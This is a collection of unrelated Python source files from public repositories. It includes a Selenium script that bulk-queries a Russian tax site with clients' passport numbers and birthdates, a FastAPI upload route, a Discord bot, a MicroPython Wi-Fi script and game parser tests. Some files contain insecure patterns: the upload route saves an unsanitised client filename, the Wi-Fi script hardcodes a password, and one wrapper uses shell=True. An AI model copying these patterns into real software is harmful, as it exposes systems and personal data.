88816c91bfb85f287b734aff69a5b60ad43f129e
|
[
"MIT"
] | null | null | null |
inn.py
|
NLipatov/INNer
|
88816c91bfb85f287b734aff69a5b60ad43f129e
|
[
"MIT"
] | null | null | null |
import time, os, xlrd, xlwt, re, webbrowser, time_convert, Process_killer, tkinter as tk
from tkinter import messagebox as mb
from xlwt import easyxf
from threading import Thread
from selenium import webdriver
from selenium.common.exceptions import SessionNotCreatedException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from subprocess import CREATE_NO_WINDOW
from xlutils.copy import copy
direction = None
workbookname = None
status = ''
def DirWor(Dir, Wor):
global direction
global workbookname
direction = Dir
workbookname = Wor
innermessage = 'Работа над файлом'
message = ''
refreshedINN = 0
def Add_to_Message(arg):
global message
message += str( arg )
def Get_message():
return innermessage + message
def TT():
os.chdir( direction )
def Draw():
global text, status
status = 'Файл в работе'
frame = tk.Frame( root, relief='solid', bd=1, bg='grey' )
root.geometry( '700x90+500+600' )
root.iconbitmap( r"C:\INNer\INNERICC.ico" )
root.iconbitmap( r"C:\INNer\INNERICC.ico" )
root.title( 'Файл в работе' )
try:
window.iconbitmap( r"C:\INNer\INNERICC.ico" )
except:
pass
frame.pack()
text = tk.Label( frame, text='HELLO' )
text.pack( side='top' )
def Refresher():
global text
text.configure( text=Get_message() )
root.after( 1000, Refresher )
if status == 'Готово':
root.title( status )
root.lift()
root.attributes( '-topmost', True )
root.after_idle( root.attributes, '-topmost', False )
else:
root.title( status )
root = tk.Tk()
Draw()
Refresher()
root.mainloop()
def Main():
global innermessage, message, status
DriverPath = r'C:\INNer\chromedriver.exe'
os.chdir( direction )
TotalWorkingTimeStart = time.time()
Chk1 = 0
DriverPathExist = os.path.isfile( DriverPath )
if DriverPathExist == True:
pass
else:
while True:
status = 'Ошибка'
innermessage = 'Ошибка'
message = ('Не обнаружен chromedriver.exe в папке с INNer\'ом')
pass
workbook = xlrd.open_workbook( workbookname )
sheet = workbook.sheet_by_index( 0 )
workbookWT = xlrd.open_workbook( (workbookname), formatting_info=True )
sheetWT = workbookWT.sheet_by_index( 0 )
wb = copy( workbookWT )
wbsheet = wb.get_sheet( 0 )
options = Options()
options.add_argument( '--headless' )
options.add_argument( '--disable-gpu' )
options.add_experimental_option( 'excludeSwitches', ['enable-logging'] )
try:
driver = webdriver.Chrome( f'{DriverPath}', options=options )
except SessionNotCreatedException as session_not_created_ex:
error_text = str( session_not_created_ex )[29:]
status = 'Ошибка'
innermessage = 'Описание возникшей ошибки:'
message = (f'\n{error_text}')
if mb.askyesno( title='Требуется обновление chromedriver.exe', \
message='Перейти на страницу загрузи chromedriver?' ):
Process_killer.process_kill( 'chromedriver.exe' )
webbrowser.open( 'https://chromedriver.chromium.org/downloads' )
mb.showinfo( title='Подсказка', \
message='После загрузки новой версии \'chromedriver.exe\',\
скопируйте её в C:\INNer с заменой файлов' )
while True:
pass
TotalClientsNumber = sheet.nrows - 1
TotalClientsNumberNowWorking = 0
RFW = 1
infoApproxTime = (f'Ожидаемое время работы {(3.7 * sheet.nrows - TotalClientsNumber) / 60} минут(-ы)\n\n\n')
message = str( infoApproxTime )
try:
for i in range( 1, sheet.nrows ):
message = str( f'\n\nКлиентов обработано: {TotalClientsNumberNowWorking}/{TotalClientsNumber}\n' )
ST = time.time()
RFW = i
translit_name = sheet.cell_value( i, 5 )
re_res = re.findall( r'^\w+', f'{translit_name}' )
if re_res[0].lower() in ['mister', 'mistress', 'mizz', 'miss', 'mr', 'mrs', 'miss', 'ms', 'dr']:
corrected_translit_name = translit_name.replace( f'{re_res[0]} ', '' )
wbsheet.write( i, 5, corrected_translit_name, easyxf( 'font: name Calibri, height 220;' ) )
wb.save( 'INNERED — ' + workbookname )
nam = sheet.cell_value( i, 2 )
if nam == '':
message += str( '\n\n\nBreak. File ends here — blank cell at clients name\n\n\n' )
break
otch = sheet.cell_value( i, 3 )
lotch = str( sheet.cell_value( i, 3 ) ).lower()
fam = sheet.cell_value( i, 4 )
pnum = sheet.cell_value( i, 7 ) + sheet.cell_value( i, 8 )
bdate = sheet.cell_value( i, 19 ).replace( '-', '' )
if lotch == '' or lotch == 'отсутствует' or lotch == 'нет' or lotch == '-':
middle_name = False
else:
middle_name = True
if middle_name:
infoNowWorkingOnClient = str( f'Приступил к: {fam} {nam[0]}. {otch[0]}.' )
print(middle_name)
elif not middle_name:
infoNowWorkingOnClient = str( f'Приступил к: {fam} {nam[0]}.' )
print( middle_name )
message = message + str( infoNowWorkingOnClient )
refreshedINN = 0
if RFW != i:
Chk1 += 1
while True:
status = 'Ошибка'
innermessage = 'Ошибка'
message = ('Критическая ошибка: RFW != i!')
pass
if fam == sheet.cell_value( i, 4 ):
pass
else:
while True:
status = 'Ошибка'
innermessage = 'Ошибка'
message = ('\nЗавершение работы - Критическая ошибка - Фамилия из сайта и из файла не совпали')
pass
if Chk1 < 1:
for i in range( 0, 10 ):
try:
driver.get( 'https://service.nalog.ru/static/personal-data.html?svc=inn&from=%2Finn.do' )
driver.find_element_by_id( "unichk_0" ).click()
driver.find_element_by_id( "btnContinue" ).click()
time.sleep( 0.5 )
for i in range( 0, (len( fam )) ):
driver.find_element_by_name( "fam" ).send_keys( fam[i] )
for i in range( 0, (len( nam )) ):
driver.find_element_by_name( "nam" ).send_keys( nam[i] )
if lotch == '' or lotch == 'отсутствует' or lotch == 'нет' or lotch == '-':
driver.find_element_by_xpath( '//*[@id="unichk_0"]' ).click()
else:
for i in range( 0, (len( otch )) ):
driver.find_element_by_name( "otch" ).send_keys( otch[i] )
for i in range( 0, (len( bdate )) ):
driver.find_element_by_name( "bdate" ).send_keys( bdate[i] )
for i in range( 0, (len( pnum )) ):
driver.find_element_by_name( "docno" ).send_keys( pnum[i] )
driver.find_element_by_id( "btn_send" ).click()
break
except:
status = 'Ошибка'
innermessage = 'Ошибка возникла до получения результата запроса, после отправки запроса.'
for i in range( 0, 10 ):
try:
result = driver.find_element_by_xpath( '//*[@id="result_1"]/div' ).text
if result == '':
time.sleep( 0.5 )
if i == 9:
res_msg = driver.find_element_by_xpath(
'/html/body/div[1]/div[3]/div/form/div[1]/div[1]/div/div[2]/p[1]' ).text
status = 'Ошибка'
innermessage = f'{res_msg}'
TotalClientsNumberNowWorking += 1
wbsheet.write( RFW, 17, '-' )
break
else:
wbsheet.write( RFW, 17, (result[32:69]) )
ET = time.time()
print( f'\nИНН:{result[32:69]}' )
wb.save( 'INNERED — ' + workbookname )
status = 'Файл в работе'
innermessage = f'Записал — ИНН клиента {fam}: {result[32:69]}' + \
'\nРезультат получен и записан за %.1f секунды' % ((ET - ST))
TotalClientsNumberNowWorking += 1
break
except:
if i == 9:
status = 'Файл в работе'
innermessage = 'Не нашёл элемент, содержащий ИНН'
message = (f'i - {i}, fam - {fam}')
wbsheet.write( RFW, 17, '-' )
wb.save( 'INNERED — ' + workbookname )
TotalClientsNumberNowWorking += 1
else:
status = 'Критическая ошибка'
innermessage = 'Работа программы остановлена'
message = ('Не пройдена проверка Chk1.')
except PermissionError:
status = 'Критическая ошибка'
innermessage = 'Работа программы остановлена'
message = ('Критическая ошибка — Файл нужно закрыть!')
driver.quit()
if Chk1 == 0:
status = 'Готово!'
innermessage = '\nРабота завершена остановлена'
message = ('\nФайл обработан')
else:
status = 'Результат работы не подлежит использованию!'
innermessage = 'Внимание:'
message = ('Работа завершена с ошибками!')
while True:
pass
TotalWorkingTimeEnd = time.time()
innermessage = 'Готово'
EndingA = ('\nПрограмма отработала за %.1f минут(-ы)' % (((TotalWorkingTimeEnd - TotalWorkingTimeStart) / 60)))
EndingB = ('\nТемп равен %.1f секунд(-ы) на одного клиента' % (
((TotalWorkingTimeEnd - TotalWorkingTimeStart) / sheet.nrows)))
message = str( EndingA )
message += str( EndingB )
workbook.release_resources()
status = 'Работа завершена'
def Start():
MAin_thread = Thread( target=Main )
MAin_thread.start()
TT_thread = Thread( target=TT )
TT_thread.start()
# Destroyer_thread = Thread(target=Destroyer())
# Destroyer_thread.start()
# MAin_thread.join()
# TT_thread.join()
| 41.862963
| 116
| 0.508891
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,391
| 0.27736
|
bb67b96194c55ddd1e174b93f999f14cfde628ec
| 803
|
py
|
Python
|
backend/src/api/routes.py
|
gideonmandu/image-difference
|
50007e5a899f5f10f519ac76312cd60f76c2ddd2
|
[
"MIT"
] | null | null | null |
backend/src/api/routes.py
|
gideonmandu/image-difference
|
50007e5a899f5f10f519ac76312cd60f76c2ddd2
|
[
"MIT"
] | null | null | null |
backend/src/api/routes.py
|
gideonmandu/image-difference
|
50007e5a899f5f10f519ac76312cd60f76c2ddd2
|
[
"MIT"
] | null | null | null |
import uuid
from typing import Optional
from fastapi import UploadFile, APIRouter
from src.services.image_processing import ImageProcessor
router = APIRouter(prefix="/file", tags=["passport & ID upload"])
# @router.get("",)
# async def index():
# return {"test": "hello world"}
@router.post("/upload/")
async def create_upload_file(file: Optional[UploadFile] = None):
if not file:
return {"message": "No upload file sent"}
file.filename = f"src/files/{file.filename}.{file.filename.split('.')[1]}"
image_bytes = await file.read()
with open(f"{file.filename}", "wb") as f:
f.write(image_bytes)
image_processor = ImageProcessor(image=f"{file.filename}")
return {
"filename": file.filename,
"imagetype": image_processor.image_type(),
}
| 28.678571
| 78
| 0.671233
| 0
| 0
| 0
| 0
| 515
| 0.641345
| 490
| 0.610212
| 262
| 0.326276
|
bb67eb4b7ecd3f699aaf7a537dafe8901082a0fc
| 1,474
|
py
|
Python
|
pdf_gen.py
|
MasatoHanayama/pdf_gen
|
b16491a31cea0d1a4931e979d600870d6be07c3e
|
[
"MIT"
] | 1
|
2022-03-15T12:57:46.000Z
|
2022-03-15T12:57:46.000Z
|
pdf_gen.py
|
MasatoHanayama/pdf_gen
|
b16491a31cea0d1a4931e979d600870d6be07c3e
|
[
"MIT"
] | null | null | null |
pdf_gen.py
|
MasatoHanayama/pdf_gen
|
b16491a31cea0d1a4931e979d600870d6be07c3e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import argparse
import img2pdf
import tqdm
from natsort import natsorted
from PIL import Image
def pdf_gen(src, dst):
pages = []
for file in natsorted(os.listdir(src)):
if os.path.splitext(file)[-1] == '.jpg' or os.path.splitext(file)[-1] == '.jpeg' or os.path.splitext(file)[-1] == '.png':
pages.append(os.path.join(src, file))
if len(pages) == 0:
print("Failed: {}".format(src))
return
with open(dst, 'wb') as pdf:
pdf.write(img2pdf.convert(pages))
def webp2png(src):
for file in natsorted(os.listdir(src)):
if os.path.splitext(file)[-1] == '.webp':
im = Image.open(os.path.join(src, file)).convert('RGB')
im.save(os.path.join(src, '{}.png'.format(os.path.splitext(file)[0])), 'png')
os.remove(os.path.join(src, file))
def main(src_path):
dirs = [f.path for f in os.scandir(src_path) if f.is_dir()]
# for dir in tqdm.tqdm(dirs):
for dir in dirs:
print(dir)
webp2png(dir)
pdf_gen(dir, '{}.pdf'.format(dir))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('src', help='src dir')
args = parser.parse_args()
main(args.src)
# dirs = [f.path for f in os.scandir(args.src) if f.is_dir()]
# # for dir in tqdm.tqdm(dirs):
# for dir in dirs:
# print(dir)
# webp2png(dir)
# pdf_gen(dir, '{}.pdf'.format(dir))
| 28.346154
| 129
| 0.586839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 329
| 0.223202
|
bb67fb540424cdb298487932ac6c8b19b1c4e193
| 1,113
|
py
|
Python
|
userapiexpiry.py
|
tjarrettveracode/veracode-python-api_credentials_expiry-example
|
3188c53f81c4bf0b5f4d27f4aa1dc3de2f3f5aef
|
[
"MIT"
] | null | null | null |
userapiexpiry.py
|
tjarrettveracode/veracode-python-api_credentials_expiry-example
|
3188c53f81c4bf0b5f4d27f4aa1dc3de2f3f5aef
|
[
"MIT"
] | null | null | null |
userapiexpiry.py
|
tjarrettveracode/veracode-python-api_credentials_expiry-example
|
3188c53f81c4bf0b5f4d27f4aa1dc3de2f3f5aef
|
[
"MIT"
] | null | null | null |
import sys
import requests
import datetime
from dateutil.parser import parse
from veracode_api_py import VeracodeAPI as vapi
def creds_expire_days_warning():
creds = vapi().get_creds()
exp = datetime.datetime.strptime(creds['expiration_ts'], "%Y-%m-%dT%H:%M:%S.%f%z")
delta = exp - datetime.datetime.now().astimezone() #we get a datetime with timezone...
if (delta.days < 7):
print('These API credentials expire {}'.format(creds['expiration_ts']))
def main():
# CHECK FOR CREDENTIALS EXPIRATION
creds_expire_days_warning()
data = vapi().get_users()
for user in data:
data2 = vapi().get_user(user["user_id"])
if "api_credentials" in data2:
date_time_str = parse(data2["api_credentials"]["expiration_ts"])
date = date_time_str.date()
time = date_time_str.time()
print("User {} API Credentials expiration date is {} {}".format(user["user_name"],str(date),str(time)))
else:
print("User {} has no API credentials".format(user["user_name"]))
if __name__ == '__main__':
main()
| 32.735294
| 115
| 0.645103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 328
| 0.294699
|
bb68392d7aa3e6ae41470c5c442a63fe00343194
| 3,258
|
py
|
Python
|
recipes/tensorflow/samples/pytorch/cifar10/samples/tensorflow/scorer.py
|
arturrutkiewicz-divae/aep-rfm-score
|
705fc54e505fdb8763073401be7b97c81474b0a9
|
[
"Apache-2.0"
] | 18
|
2018-12-13T18:53:31.000Z
|
2021-09-29T20:14:05.000Z
|
recipes/tensorflow/samples/pytorch/cifar10/samples/tensorflow/scorer.py
|
DalavanCloud/experience-platform-dsw-reference
|
2e0af85a47ec05b7cda77d61954c1cde0a625f5c
|
[
"Apache-2.0"
] | 27
|
2019-01-02T22:52:51.000Z
|
2021-05-26T15:14:17.000Z
|
recipes/tensorflow/samples/pytorch/cifar10/samples/tensorflow/scorer.py
|
DalavanCloud/experience-platform-dsw-reference
|
2e0af85a47ec05b7cda77d61954c1cde0a625f5c
|
[
"Apache-2.0"
] | 18
|
2019-01-09T19:34:57.000Z
|
2020-10-19T11:06:50.000Z
|
#
# Copyright 2017 Adobe.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ml.runtime.tensorflow.Interfaces.AbstractScorer import AbstractScorer
import tensorflow as tf
import numpy
import torch
import torchvision
import torchvision.transforms as transforms
import torch.nn as nn
import torch.nn.functional as F
class Scorer(AbstractScorer):
def score(self, config={}):
"""loads trained weights and scores on test cofar-10 data
load trained model using the weights,
load the test dataset,
score and compute accuracy
:param config: passed on by ml-framework
:return: None
"""
print("Executed scorer 2")
print(config["modelPATH"])
print(config["logsPATH"])
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
testset = torchvision.datasets.CIFAR10(root='./data',
train=False,
download=True,
transform=transform)
testloader = torch.utils.data.DataLoader(testset,
batch_size=4,
shuffle=False,
num_workers=2)
net = Net()
state_dict = torch.load(config["modelPATH"] +
"/my_cifar_pytorch_model.dict")
net.load_state_dict(state_dict)
correct = 0
total = 0
with torch.no_grad():
for data in testloader:
images, labels = data
outputs = net(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the 10000 test images: %d %%' % (
100 * correct / total))
| 34.659574
| 75
| 0.533456
| 2,432
| 0.74647
| 0
| 0
| 0
| 0
| 0
| 0
| 963
| 0.29558
|
bb69473a0d64dae39589b39408b2ff33e2930247
| 1,486
|
py
|
Python
|
data_loading.py
|
dahouda2pro/deep-learned-embedding
|
a4428cf99eae86691286ec18a0656e632fbc4600
|
[
"CC0-1.0"
] | null | null | null |
data_loading.py
|
dahouda2pro/deep-learned-embedding
|
a4428cf99eae86691286ec18a0656e632fbc4600
|
[
"CC0-1.0"
] | null | null | null |
data_loading.py
|
dahouda2pro/deep-learned-embedding
|
a4428cf99eae86691286ec18a0656e632fbc4600
|
[
"CC0-1.0"
] | 1
|
2021-12-21T05:27:19.000Z
|
2021-12-21T05:27:19.000Z
|
import pandas as pd
import numpy as np
print("Data Loading....")
#data = pd.read_csv("adult.csv")
data = pd.read_csv("adult_2.csv")
# print(data)
# print(data.columns)
# print(data.shape)
# print(data.info())
# print(data.nunique())
data.describe()
data.isin(['?']).sum()
data = data.replace('?', np.NaN)
for col in ['workclass', 'occupation', 'native.country']:
data[col].fillna(data[col].mode()[0], inplace=True)
data.isnull().sum()
data['income'].value_counts()
data['income'] = data['income'].map({'<=50K': 0, '>50K': 1})
# print(data.head())
print("********** Checking Missing Values **********")
print(data.isnull().sum())
# Separate the numeric and categorical variables
numeric_data = data.select_dtypes(include=[np.number])
categorical_data = data.select_dtypes(exclude=[np.number])
print("Numeric Variable")
print(numeric_data.head())
print(numeric_data.info())
print(numeric_data.columns)
print("Shape of Numeric Data :", numeric_data.shape)
print(categorical_data.nunique())
print("Categorical Variable")
print(categorical_data.head())
print("Shape of Numeric Data :", categorical_data.shape)
# We have to rename all the columns of Categorical variable subset
categorical_data.columns = ['Private', 'HSgrad', 'Widowed',
'Execmanagerial', 'Unmarried', 'Black', 'Female', 'UnitedStates']
print(categorical_data.head())
print("Shape of Numeric Data :", categorical_data.shape)
| 29.72
| 94
| 0.669583
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 636
| 0.427995
|
bb69a0519f4167f3e5c1740dabcb4206f8eb16f8
| 261
|
py
|
Python
|
Projects/ESP32Micropython/flash memory/newConnectTest.py
|
TizioMaurizio/ArduinoWorkshop
|
d38ede91c6b7a925eafb0272a5fa9f44885ae017
|
[
"MIT"
] | null | null | null |
Projects/ESP32Micropython/flash memory/newConnectTest.py
|
TizioMaurizio/ArduinoWorkshop
|
d38ede91c6b7a925eafb0272a5fa9f44885ae017
|
[
"MIT"
] | null | null | null |
Projects/ESP32Micropython/flash memory/newConnectTest.py
|
TizioMaurizio/ArduinoWorkshop
|
d38ede91c6b7a925eafb0272a5fa9f44885ae017
|
[
"MIT"
] | null | null | null |
import network
import time
sta_if = network.WLAN(network.STA_IF)
sta_if.active(True)
for _ in range(10):
sta_if.connect('RedmiMau', 'mau12397')
time.sleep(1)
if sta_if.isconnected():
print('Connected.')
break
time.sleep(11)
else:
print('Fail')
| 20.076923
| 39
| 0.701149
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 38
| 0.145594
|
bb6a551fb3c28dd9d932bdf287bf2fe78a03a168
| 1,313
|
py
|
Python
|
FilterPackets.py
|
aj351/peershark
|
80e06319f61381fe163383e5984d70a5f23760b4
|
[
"MIT"
] | 31
|
2015-02-11T14:32:24.000Z
|
2022-02-10T11:08:23.000Z
|
FilterPackets.py
|
aj351/peershark
|
80e06319f61381fe163383e5984d70a5f23760b4
|
[
"MIT"
] | 1
|
2015-12-29T11:17:45.000Z
|
2017-10-11T08:48:49.000Z
|
FilterPackets.py
|
aj351/peershark
|
80e06319f61381fe163383e5984d70a5f23760b4
|
[
"MIT"
] | 26
|
2015-06-05T04:51:46.000Z
|
2022-03-22T20:28:52.000Z
|
## Module to obtain packet data from a pcap/dump file
## and save it in csv format using tshark.
## Filenames of input pcap files are taken from InputFiles.txt
## Tshark options are present in TsharkOptions.txt
## TsharkOptions.txt should not contain the -r option.
## usage: python FilterPackets.py
#import global constants
from P2P_CONSTANTS import *
from FilterPacketsHelper import *
import multiprocessing as MP
import subprocess
#execute a shell command as a child process
def executeCommand(command,outfilename):
sem.acquire()
subprocess.call(command, shell = True)
infile = open(outfilename, 'r')
data = [eachline.strip() for eachline in infile]
infile.close()
data = preprocess(data)
outfile = open(outfilename,'w')
for eachcomponent in data:
outfile.write(eachcomponent)
outfile.close()
print 'done processing : ' + outfilename
sem.release()
#obtain input parameters and pcapfilenames
inputfiles = getPCapFileNames()
tsharkOptions = getTsharkOptions()
#create a semaphore so as not to exceed threadlimit
sem = MP.Semaphore(THREADLIMIT)
#get tshark commands to be executed
for filename in inputfiles:
print filename
(command,outfilename) = contructTsharkCommand(filename,tsharkOptions)
task = MP.Process(target = executeCommand, args = (command, outfilename,))
task.start()
| 27.93617
| 75
| 0.770754
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 515
| 0.392232
|
bb6b66c4796e5839d80de0a9f7880f3c7a632215
| 2,829
|
py
|
Python
|
cogs/start.py
|
Yureehh/Perfecto---O---Tron
|
cfd6f1819a9e4b7a9a406061bb7fadfea4084a86
|
[
"MIT"
] | null | null | null |
cogs/start.py
|
Yureehh/Perfecto---O---Tron
|
cfd6f1819a9e4b7a9a406061bb7fadfea4084a86
|
[
"MIT"
] | 1
|
2020-09-16T16:27:52.000Z
|
2020-09-16T16:27:52.000Z
|
cogs/start.py
|
Yureehh/Perfecto---O---Tron
|
cfd6f1819a9e4b7a9a406061bb7fadfea4084a86
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands,tasks
from datetime import datetime
import asyncio
from itertools import cycle
#number of minutes used at timer for loops
MINUTES_TO_WAIT = 30
#in the brackets there's the class you are extending
class Start(commands.Cog):
def __init__(self, bot, messages=0, joined=0):
self.bot = bot
self.messages = messages
self.joined = joined
#Status the bot will cicle. All of them are memes of course
self.status = cycle(["League of Lol", "with your mind", "with your fate", "with your secrets", "Fortine is for kids", "CS:GO is old", "Valoraahahahahnt","with your emotions"])
async def update_stats(self):
while not self.bot.is_closed():
try:
now = datetime.now()
current_time = now.strftime("%D %H:%M:%S")
with open("stats.txt", "a+") as f:
f.write(f"Time: {current_time}, Messages: {self.messages}, Members Joined: {self.joined}\n")
self.messages = 0
self.joined = 0
await asyncio.sleep(MINUTES_TO_WAIT * 60)
except Exception as e:
print(e)
await asyncio.sleep(MINUTES_TO_WAIT * 60)
@commands.Cog.listener()
async def on_ready(self):
await self.bot.change_presence(status=discord.Status.online )
self.changeStatus.start()
self.bot.loop.create_task(self.update_stats())
print("Bot launched")
@tasks.loop(seconds = MINUTES_TO_WAIT * 60)
async def changeStatus(self):
await self.bot.change_presence(activity = discord.Game(next(self.status)))
@commands.Cog.listener()
async def on_message(self, message):
self.messages += 1
#await self.bot.process_commands(message)
@commands.Cog.listener()
async def on_member_join(self, member):
self.joined += 1
for channel in member.guild.channels:
if str(channel) == "welcome":
await channel.send(f"Welcome to the server {member.mention}", file = discord.File("images/welcome.jpg"))
@commands.Cog.listener()
async def on_member_remove(self, member):
message = f"Bye bye {member.mention}, looking forward to your return"
for channel in member.guild.channels:
if str(channel) == "welcome" or str(channel) == "goodbyes":
await channel.send(f"{member.mention} left the server", file = discord.File("images/missYou.jpg"))
#happens when someone tries to rename himself
@commands.Cog.listener()
async def on_member_update(self, before, after):
n = after.nick
if n:
if "Yureeh" in n.lower():
await after.edit(nick = "Don't you dare")
def setup(bot):
bot.add_cog(Start(bot))
| 36.269231
| 183
| 0.625309
| 2,538
| 0.897137
| 0
| 0
| 1,438
| 0.508307
| 1,837
| 0.649346
| 730
| 0.258042
|
bb6cc5ff9b1a00d13872972359a28898848fa4c7
| 14,716
|
py
|
Python
|
tests/test_parser.py
|
RathmoreChaos/intficpy
|
a5076bba93208dc18dcbf2e4ad720af9e2127eda
|
[
"MIT"
] | 25
|
2019-04-30T23:51:44.000Z
|
2022-03-23T02:02:54.000Z
|
tests/test_parser.py
|
RathmoreChaos/intficpy
|
a5076bba93208dc18dcbf2e4ad720af9e2127eda
|
[
"MIT"
] | 4
|
2019-07-09T03:43:35.000Z
|
2022-01-10T23:41:46.000Z
|
tests/test_parser.py
|
RathmoreChaos/intficpy
|
a5076bba93208dc18dcbf2e4ad720af9e2127eda
|
[
"MIT"
] | 5
|
2021-04-24T03:54:39.000Z
|
2022-01-06T20:59:03.000Z
|
from .helpers import IFPTestCase
from intficpy.ifp_game import IFPGame
from intficpy.thing_base import Thing
from intficpy.things import Surface, UnderSpace
from intficpy.actor import Actor, SpecialTopic
from intficpy.verb import (
IndirectObjectVerb,
GetVerb,
LookVerb,
SetOnVerb,
LeadDirVerb,
JumpOverVerb,
GiveVerb,
ExamineVerb,
GetAllVerb,
)
from intficpy.exceptions import ObjectMatchError
class TestParser(IFPTestCase):
def test_verb_with_no_objects(self):
self.game.turnMain("look")
self.assertIs(self.game.parser.command.verb, LookVerb)
self.assertIsNone(self.game.parser.command.dobj.target)
self.assertIsNone(self.game.parser.command.iobj.target)
def test_verb_with_dobj_only(self):
dobj = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(dobj)
self.game.turnMain(f"get {dobj.name}")
self.assertIs(self.game.parser.command.verb, GetVerb)
self.assertIs(self.game.parser.command.dobj.target, dobj)
self.assertIsNone(self.game.parser.command.iobj.target)
def test_gets_correct_verb_with_dobj_and_direction_iobj(self):
dobj = Actor(self.game, self._get_unique_noun())
self.start_room.addThing(dobj)
iobj = "east"
self.start_room.east = self.start_room
self.game.turnMain(f"lead {dobj.name} {iobj}")
self.assertIs(self.game.parser.command.verb, LeadDirVerb)
self.assertIs(self.game.parser.command.dobj.target, dobj)
self.assertEqual(self.game.parser.command.iobj.target, iobj)
def test_gets_correct_verb_with_preposition_dobj_only(self):
dobj = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(dobj)
self.game.turnMain(f"jump over {dobj.name}")
self.assertIs(self.game.parser.command.verb, JumpOverVerb)
self.assertIs(self.game.parser.command.dobj.target, dobj)
self.assertIsNone(self.game.parser.command.iobj.target)
def test_gets_correct_verb_with_preposition_dobj_and_iobj(self):
dobj = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(dobj)
iobj = Surface(self.game, self._get_unique_noun())
self.start_room.addThing(iobj)
self.game.turnMain(f"set {dobj.name} on {iobj.name}")
self.assertIs(self.game.parser.command.verb, SetOnVerb)
self.assertIs(self.game.parser.command.dobj.target, dobj)
self.assertIs(self.game.parser.command.iobj.target, iobj)
class TestGetGrammarObj(IFPTestCase):
def test_gets_correct_objects_with_adjacent_dobj_iobj(self):
dobj_item = Actor(self.game, self._get_unique_noun())
self.start_room.addThing(dobj_item)
iobj_item = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(iobj_item)
self.game.turnMain(f"give {dobj_item.name} {iobj_item.name}")
self.assertEqual(self.game.parser.command.dobj.target, dobj_item)
self.assertEqual(self.game.parser.command.iobj.target, iobj_item)
class TestAdjacentStrObj(IFPTestCase):
class StrangeVerb(IndirectObjectVerb):
word = "strange"
syntax = [["strange", "<iobj>", "<dobj>"]]
hasStrIobj = True
iscope = "text"
dscope = "near"
def strangeVerbFunc(game, dobj, iobj):
game.addTextToEvent("turn", "You do strange things")
return True
def test_thing_follows_string_adjacent_string_object(self):
thing = Thing(self.game, "thing")
thing.setAdjectives(["good"])
self.start_room.addThing(thing)
self.game.turnMain("strange purple good thing")
self.assertIs(
self.game.parser.command.verb,
self.StrangeVerb,
"Unexpected verb from command with adjacent string objects where thing "
"follows string",
)
self.assertIs(
self.game.parser.command.dobj.target,
thing,
"Unexpected dobj from command with adjacent string objects where thing "
"follows string",
)
class TestGetThing(IFPTestCase):
def test_get_thing(self):
noun = self._get_unique_noun()
self.assertNotIn(
noun,
self.game.nouns,
f"This test needs the value of noun ({noun}) to be such that it does not "
"initially exist in self.game.nouns",
)
item1 = Thing(self.game, noun)
self.start_room.addThing(item1)
self.assertTrue(
noun in self.game.nouns,
"Name was not added to self.game.nouns after Thing creation",
)
self.game.turnMain(f"examine {noun}")
self.assertIs(
self.game.parser.command.dobj.target,
item1,
"Failed to match item from unambiguous noun",
)
item2 = Thing(self.game, noun)
self.start_room.addThing(item2)
self.assertEqual(len(self.game.nouns[noun]), 2)
adj1 = "unique"
adj2 = "special"
self.assertNotEqual(
adj1, adj2, "This test requires that adj1 and adj2 are not equal"
)
item1.setAdjectives([adj1])
item2.setAdjectives([adj2])
self.game.turnMain(f"examine {noun}")
self.assertEqual(self.game.parser.command.dobj.tokens, [noun])
self.game.turnMain(f"examine {adj1} {noun}")
self.assertIs(
self.game.parser.command.dobj.target,
item1,
"Noun adjective array should have been unambiguous, but failed to match "
"Thing",
)
class TestParserError(IFPTestCase):
def test_verb_not_understood(self):
self.game.turnMain("thisverbwillnevereverbedefined")
msg = self.app.print_stack.pop()
expected = "I don't understand the verb:"
self.assertIn(expected, msg, "Unexpected response to unrecognized verb.")
def test_suggestion_not_understood(self):
topic = SpecialTopic(
self.game, "tell sarah to grow a beard", "You tell Sarah to grow a beard."
)
self.game.parser.command.specialTopics["tell sarah to grow a beard"] = topic
self.game.turnMain("thisverbwillnevereverbedefined")
msg = self.app.print_stack.pop()
expected = "is not enough information to match a suggestion"
self.assertIn(expected, msg, "Unexpected response to unrecognized suggestion.")
def test_noun_not_understood(self):
self.game.turnMain("take thisnounwillnevereverbedefined")
msg = self.app.print_stack.pop()
expected = "I don't see any"
self.assertIn(expected, msg, "Unexpected response to unrecognized noun.")
def test_verb_by_objects_unrecognized_noun(self):
self.game.turnMain("lead sarah")
